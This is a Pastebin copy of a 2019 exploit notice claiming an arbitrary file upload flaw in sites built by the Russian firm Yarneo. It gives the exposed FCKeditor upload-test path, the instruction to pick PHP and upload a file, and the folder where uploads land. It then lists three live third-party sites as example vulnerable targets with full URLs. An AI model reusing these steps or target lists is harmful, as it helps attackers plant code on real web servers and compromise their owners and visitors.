API tools faq
paste
KingSkrupellos

Yarneo WebDesign Unauthorized File Insertion

KingSkrupellos
May 21st, 2019
89
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.26 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : Yarneo WebDesign Unauthorized File Insertion
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 21/05/2019
  7. # Vendor Homepage : yarneo.ru
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
  12. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  13. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  14. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  15.  
  16. ####################################################################
  17.  
  18. # Description About Software :
  19. *****************************
  20. Yarneo is a Web Design and Development Company in Russia.
  21.  
  22. ####################################################################
  23.  
  24. # Impact :
  25. ***********
  26. Yarneo is prone to a vulnerability that lets attackers upload arbitrary files because
  27. it fails to adequately sanitize user-supplied input.
  28.  
  29. An attacker can exploit this vulnerability to upload arbitrary code and execute
  30. it in the context of the webserver process. This may facilitate unauthorized access
  31. or privilege escalation; other attacks are also possible.
  32.  
  33. ####################################################################
  34.  
  35. # Arbitrary File Upload / Unauthorized File Insert Exploit :
  36. **************************************************
  37. /fckeditor/editor/filemanager/connectors/uploadtest.html
  38.  
  39. Select the "File Uploader" to use : Choose PHP and upload your file.
  40.  
  41. Directory File Path :
  42. **********************
  43. /pic/userfile/[YOURFILENAME].txt .jpg .gif .png
  44.  
  45. ####################################################################
  46.  
  47. # Example Vulnerable Sites :
  48. ************************
  49. [+] xn--1-7sb3aeok0dwc.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html
  50.  
  51. [+] xn--l1adfni2d.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html
  52.  
  53. [+] xn--90auhhdlh4g.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html
  54.  
  55. ####################################################################
  56.  
  57. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  58.  
  59. ####################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!